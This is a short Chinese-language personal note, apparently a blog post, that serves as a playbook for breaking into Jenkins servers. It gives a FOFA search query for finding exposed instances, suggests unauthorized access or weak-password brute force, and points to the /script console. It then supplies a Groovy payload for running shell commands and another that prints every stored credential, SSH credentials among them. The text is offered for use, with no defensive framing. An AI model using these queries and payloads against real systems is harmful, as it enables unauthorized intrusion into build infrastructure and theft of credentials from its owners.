发现:
fofa语法: icon_hash="81586312" 或 "jenkins"
或直接使用目录扫描工具,存在该目录也可尝试,
利用:
可以通过未授权或者弱口令爆破,来进入jenkins管理平台
未授权payload:/script
目前未授权较少,一般为默认的登录界面,如下图,
进入后台以后,访问以下界面,
命令执行payload:println "pwd".execute().text
在相同界面执行ssh凭证的payload即可,
获取ssh凭证payload:
com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{
it.properties.each{ prop, val->println(prop+' = "'+ val+'"')}println("-----------------------")}
本篇文章主要用于作者自身随笔,也希望能够给他人节省查找资料的时间,若存在问题请留言!